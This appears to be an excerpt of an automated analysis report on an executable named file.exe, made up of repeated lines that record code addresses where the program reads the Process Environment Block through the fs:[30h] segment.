Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017520F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017180E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017960E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017920DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017D60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017D60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017DA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01730310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017463FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B43D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B43D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017CC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017963C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170826B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01716259 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01798243 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01798243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170823B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017202A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017202A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01718550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01718550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A6500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017125E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017165D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017345B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017345B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01712582 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01712582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01744588 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179C460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173245A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170645D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0174A430 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017104E5 mov ecx, dword ptr fs:[00000030h]4_2_017104E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017444B0 mov ecx, dword ptr fs:[00000030h]4_2_017444B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A4B0 mov eax, dword ptr fs:[00000030h]4_2_0179A4B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017164AB mov eax, dword ptr fs:[00000030h]4_2_017164AB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718770 mov eax, dword ptr fs:[00000030h]4_2_01718770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710750 mov eax, dword ptr fs:[00000030h]4_2_01710750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E75D mov eax, dword ptr fs:[00000030h]4_2_0179E75D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752750 mov eax, dword ptr fs:[00000030h]4_2_01752750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752750 mov eax, dword ptr fs:[00000030h]4_2_01752750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01794755 mov eax, dword ptr fs:[00000030h]4_2_01794755
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov esi, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov eax, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov eax, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov eax, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov ecx, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov eax, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178C730 mov eax, dword ptr fs:[00000030h]4_2_0178C730
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C720 mov eax, dword ptr fs:[00000030h]4_2_0174C720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C720 mov eax, dword ptr fs:[00000030h]4_2_0174C720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710710 mov eax, dword ptr fs:[00000030h]4_2_01710710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740710 mov eax, dword ptr fs:[00000030h]4_2_01740710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C700 mov eax, dword ptr fs:[00000030h]4_2_0174C700
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017147FB mov eax, dword ptr fs:[00000030h]4_2_017147FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017147FB mov eax, dword ptr fs:[00000030h]4_2_017147FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E7E1 mov eax, dword ptr fs:[00000030h]4_2_0179E7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171C7C0 mov eax, dword ptr fs:[00000030h]4_2_0171C7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017907C3 mov eax, dword ptr fs:[00000030h]4_2_017907C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017107AF mov eax, dword ptr fs:[00000030h]4_2_017107AF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B678E mov eax, dword ptr fs:[00000030h]4_2_017B678E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01742674 mov eax, dword ptr fs:[00000030h]4_2_01742674
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D866E mov eax, dword ptr fs:[00000030h]4_2_017D866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D866E mov eax, dword ptr fs:[00000030h]4_2_017D866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A660 mov eax, dword ptr fs:[00000030h]4_2_0174A660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A660 mov eax, dword ptr fs:[00000030h]4_2_0174A660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172C640 mov eax, dword ptr fs:[00000030h]4_2_0172C640
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01746620 mov eax, dword ptr fs:[00000030h]4_2_01746620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748620 mov eax, dword ptr fs:[00000030h]4_2_01748620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E627 mov eax, dword ptr fs:[00000030h]4_2_0172E627
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171262C mov eax, dword ptr fs:[00000030h]4_2_0171262C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752619 mov eax, dword ptr fs:[00000030h]4_2_01752619
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E609 mov eax, dword ptr fs:[00000030h]4_2_0178E609
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017906F1 mov eax, dword ptr fs:[00000030h]4_2_017906F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017906F1 mov eax, dword ptr fs:[00000030h]4_2_017906F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
